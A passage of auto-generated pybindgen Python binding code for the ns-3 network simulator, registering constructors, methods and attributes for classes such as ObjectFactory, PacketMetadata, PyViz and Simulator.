## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PyViz_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::PyViz(ns3::PyViz const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::PyViz() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample ns3::PyViz::GetLastPackets(uint32_t nodeId) const [member function]
cls.add_method('GetLastPackets',
'ns3::PyViz::LastPacketsSample',
[param('uint32_t', 'nodeId')],
is_const=True)
## pyviz.h (module 'visualizer'): std::vector<ns3::PyViz::NodeStatistics,std::allocator<ns3::PyViz::NodeStatistics> > ns3::PyViz::GetNodesStatistics() const [member function]
cls.add_method('GetNodesStatistics',
'std::vector< ns3::PyViz::NodeStatistics >',
[],
is_const=True)
## pyviz.h (module 'visualizer'): std::vector<ns3::PyViz::PacketDropSample,std::allocator<ns3::PyViz::PacketDropSample> > ns3::PyViz::GetPacketDropSamples() const [member function]
cls.add_method('GetPacketDropSamples',
'std::vector< ns3::PyViz::PacketDropSample >',
[],
is_const=True)
## pyviz.h (module 'visualizer'): std::vector<std::string, std::allocator<std::string> > ns3::PyViz::GetPauseMessages() const [member function]
cls.add_method('GetPauseMessages',
'std::vector< std::string >',
[],
is_const=True)
## pyviz.h (module 'visualizer'): std::vector<ns3::PyViz::TransmissionSample,std::allocator<ns3::PyViz::TransmissionSample> > ns3::PyViz::GetTransmissionSamples() const [member function]
cls.add_method('GetTransmissionSamples',
'std::vector< ns3::PyViz::TransmissionSample >',
[],
is_const=True)
## pyviz.h (module 'visualizer'): static void ns3::PyViz::LineClipping(double boundsX1, double boundsY1, double boundsX2, double boundsY2, double & lineX1, double & lineY1, double & lineX2, double & lineY2) [member function]
cls.add_method('LineClipping',
'void',
[param('double', 'boundsX1'), param('double', 'boundsY1'), param('double', 'boundsX2'), param('double', 'boundsY2'), param('double &', 'lineX1', direction=3), param('double &', 'lineY1', direction=3), param('double &', 'lineX2', direction=3), param('double &', 'lineY2', direction=3)],
is_static=True)
## pyviz.h (module 'visualizer'): static void ns3::PyViz::Pause(std::string const & message) [member function]
cls.add_method('Pause',
'void',
[param('std::string const &', 'message')],
is_static=True)
## pyviz.h (module 'visualizer'): void ns3::PyViz::RegisterCsmaLikeDevice(std::string const & deviceTypeName) [member function]
cls.add_method('RegisterCsmaLikeDevice',
'void',
[param('std::string const &', 'deviceTypeName')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::RegisterDropTracePath(std::string const & tracePath) [member function]
cls.add_method('RegisterDropTracePath',
'void',
[param('std::string const &', 'tracePath')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::RegisterPointToPointLikeDevice(std::string const & deviceTypeName) [member function]
cls.add_method('RegisterPointToPointLikeDevice',
'void',
[param('std::string const &', 'deviceTypeName')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::RegisterWifiLikeDevice(std::string const & deviceTypeName) [member function]
cls.add_method('RegisterWifiLikeDevice',
'void',
[param('std::string const &', 'deviceTypeName')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::SetNodesOfInterest(std::set<unsigned int, std::less<unsigned int>, std::allocator<unsigned int> > nodes) [member function]
cls.add_method('SetNodesOfInterest',
'void',
[param('std::set< unsigned int >', 'nodes')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::SetPacketCaptureOptions(uint32_t nodeId, ns3::PyViz::PacketCaptureOptions options) [member function]
cls.add_method('SetPacketCaptureOptions',
'void',
[param('uint32_t', 'nodeId'), param('ns3::PyViz::PacketCaptureOptions', 'options')])
## pyviz.h (module 'visualizer'): void ns3::PyViz::SimulatorRunUntil(ns3::Time time) [member function]
cls.add_method('SimulatorRunUntil',
'void',
[param('ns3::Time', 'time')])
return
def register_Ns3PyVizLastPacketsSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample::LastPacketsSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample::LastPacketsSample(ns3::PyViz::LastPacketsSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::LastPacketsSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample::lastDroppedPackets [variable]
cls.add_instance_attribute('lastDroppedPackets', 'std::vector< ns3::PyViz::PacketSample >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample::lastReceivedPackets [variable]
cls.add_instance_attribute('lastReceivedPackets', 'std::vector< ns3::PyViz::RxPacketSample >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::LastPacketsSample::lastTransmittedPackets [variable]
cls.add_instance_attribute('lastTransmittedPackets', 'std::vector< ns3::PyViz::TxPacketSample >', is_const=False)
return
def register_Ns3PyVizNetDeviceStatistics_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::NetDeviceStatistics(ns3::PyViz::NetDeviceStatistics const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::NetDeviceStatistics const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::NetDeviceStatistics() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::receivedBytes [variable]
cls.add_instance_attribute('receivedBytes', 'uint64_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::receivedPackets [variable]
cls.add_instance_attribute('receivedPackets', 'uint32_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::transmittedBytes [variable]
cls.add_instance_attribute('transmittedBytes', 'uint64_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::NetDeviceStatistics::transmittedPackets [variable]
cls.add_instance_attribute('transmittedPackets', 'uint32_t', is_const=False)
return
def register_Ns3PyVizNodeStatistics_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics::NodeStatistics() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics::NodeStatistics(ns3::PyViz::NodeStatistics const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::NodeStatistics const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics::nodeId [variable]
cls.add_instance_attribute('nodeId', 'uint32_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::NodeStatistics::statistics [variable]
cls.add_instance_attribute('statistics', 'std::vector< ns3::PyViz::NetDeviceStatistics >', is_const=False)
return
def register_Ns3PyVizPacketCaptureOptions_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions::PacketCaptureOptions() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions::PacketCaptureOptions(ns3::PyViz::PacketCaptureOptions const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::PacketCaptureOptions const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions::headers [variable]
cls.add_instance_attribute('headers', 'std::set< ns3::TypeId >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions::mode [variable]
cls.add_instance_attribute('mode', 'ns3::PyViz::PacketCaptureMode', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketCaptureOptions::numLastPackets [variable]
cls.add_instance_attribute('numLastPackets', 'uint32_t', is_const=False)
return
def register_Ns3PyVizPacketDropSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample::PacketDropSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample::PacketDropSample(ns3::PyViz::PacketDropSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::PacketDropSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample::bytes [variable]
cls.add_instance_attribute('bytes', 'uint32_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketDropSample::transmitter [variable]
cls.add_instance_attribute('transmitter', 'ns3::Ptr< ns3::Node >', is_const=False)
return
def register_Ns3PyVizPacketSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample::PacketSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample::PacketSample(ns3::PyViz::PacketSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::PacketSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample::device [variable]
cls.add_instance_attribute('device', 'ns3::Ptr< ns3::NetDevice >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample::packet [variable]
cls.add_instance_attribute('packet', 'ns3::Ptr< ns3::Packet >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::PacketSample::time [variable]
cls.add_instance_attribute('time', 'ns3::Time', is_const=False)
return
def register_Ns3PyVizRxPacketSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::RxPacketSample::RxPacketSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::RxPacketSample::RxPacketSample(ns3::PyViz::RxPacketSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::RxPacketSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::RxPacketSample::from [variable]
cls.add_instance_attribute('from', 'ns3::Mac48Address', is_const=False)
return
def register_Ns3PyVizTransmissionSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::TransmissionSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::TransmissionSample(ns3::PyViz::TransmissionSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::TransmissionSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::bytes [variable]
cls.add_instance_attribute('bytes', 'uint32_t', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::channel [variable]
cls.add_instance_attribute('channel', 'ns3::Ptr< ns3::Channel >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::receiver [variable]
cls.add_instance_attribute('receiver', 'ns3::Ptr< ns3::Node >', is_const=False)
## pyviz.h (module 'visualizer'): ns3::PyViz::TransmissionSample::transmitter [variable]
cls.add_instance_attribute('transmitter', 'ns3::Ptr< ns3::Node >', is_const=False)
return
def register_Ns3PyVizTxPacketSample_methods(root_module, cls):
## pyviz.h (module 'visualizer'): ns3::PyViz::TxPacketSample::TxPacketSample() [constructor]
cls.add_constructor([])
## pyviz.h (module 'visualizer'): ns3::PyViz::TxPacketSample::TxPacketSample(ns3::PyViz::TxPacketSample const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PyViz::TxPacketSample const &', 'arg0')])
## pyviz.h (module 'visualizer'): ns3::PyViz::TxPacketSample::to [variable]
cls.add_instance_attribute('to', 'ns3::Mac48Address', is_const=False)
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Next() [member function]
cls.add_method('Next',
'ns3::Time',
[],
is_static=True, deprecated=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::RunOneEvent() [member function]
cls.add_method('RunOneEvent',
'void',
[],
is_static=True, deprecated=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
